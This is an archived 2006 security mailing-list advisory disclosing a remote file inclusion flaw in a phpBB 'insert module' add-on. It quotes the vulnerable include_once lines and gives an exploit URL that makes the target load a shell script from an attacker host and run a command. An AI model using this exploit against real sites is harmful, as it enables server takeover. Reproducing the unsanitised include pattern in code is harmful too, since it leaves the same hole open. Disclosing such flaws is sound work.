|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Phpbb insert mod Remote file include
By_KorsaN_Son
hotmail.com
Date: Thu Oct 12 2006 - 12:34:20 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
$ BiyoSecurity.Org & SecurityWall.Org
$ Script Name : Phpbb insert module
$ versions : 0.1.0 and 0.1.1
$ Risk : High
$ Regard : KorsaN
$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra
$ Vulnerable File : functions_mod_user.php
$ Vulnerable code :
<-- code start -->
include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);
$ Exploit :
www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]